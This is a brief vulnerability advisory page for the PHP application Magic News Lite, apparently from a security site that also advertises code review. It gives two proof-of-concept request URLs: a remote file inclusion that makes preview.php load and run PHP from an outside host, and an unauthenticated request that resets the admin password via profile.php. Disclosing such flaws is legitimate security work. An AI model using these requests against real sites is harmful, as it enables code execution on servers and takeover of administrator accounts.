PoC/Exploit for PHP Exec and Data Modification in Magic News Lite

Published Proof of Concept code - PHP Exec and Data Modification in Magic News Lite.

Description
Available
Solution
Not available - check Reamday Enterprises website

1. PHP Code Execution Example

http://host/path/preview.php?php_script_path=http://remotehost/lib.php


2. Unauthorized Data Modification Example

http://host/path/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new

Order PHP Code Review

Protect against attacks by source code review of a site made by Aliaksandr Hartsuyeu.The task will be done by specialists in website security.

Advisories by vuln type